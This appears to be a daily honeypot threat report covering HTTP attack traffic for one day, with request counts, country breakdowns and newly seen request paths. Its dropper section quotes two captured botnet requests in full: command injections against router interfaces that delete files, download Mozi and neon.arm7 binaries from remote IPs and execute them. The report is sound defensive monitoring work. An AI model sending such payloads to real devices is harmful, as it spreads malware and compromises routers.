Skip to main content
  1. Daily-Posts/

Report: 2025-05-23

·359 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-23
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 11 new requests that have never been observed before (these were added to the monitored request database.).

A total of 788 requests were recorded during the day, originating from 2 different countries, with a peak of 150 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
BRGermany
USGermany
JPGermany
USGermany
BRGermany
USGermany
JPGermany
FRGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
175.165.85.58GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.165.85.58:54082/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
176.65.148.236POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1191GET /OdinHttpCall1748010717 HTTP/1.1
1281GET /Odin/http/call1748010717 HTTP/1.1
1301GET /odinhttpcall1748010717 HTTP/1.1
1421GET /odinhttpcall1748036419 HTTP/1.1
1431CONNECT p-scanner.research.netd.cs.tu-dresden.de:443 HTTP/1.1
1441GET /Odin/http/call1748036419 HTTP/1.1
1451GET /OdinHttpCall1748036419 HTTP/1.1
1541GET http://141.76.94.18:80/pscan HTTP/1.1
1671GET /BtVP HTTP/1.1
1791GET /h6Qn HTTP/1.1
2531GET /photo HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0150US
1108BG
295DE
367NL
465CH
551PL
647ID
723GB
815FR
915CN
1015IN
1114AZ
1213RU
1312AU
1412SC
158LT
168AO
177IL
187GH
196VN
206SG
214BE
224PT
234JP
244BR
253NG
263KR
273IR
282ZM
292UA
302HK
312TW
322IE
331HU
341AR
351SK
361RO
371TR
381CA
391AE
401ES
411SE

Related

Report: 2025-05-22
·296 words
Repport Daily
Report: 2025-05-21
·512 words
Repport Daily
Report: 2025-05-20
·411 words
Repport Daily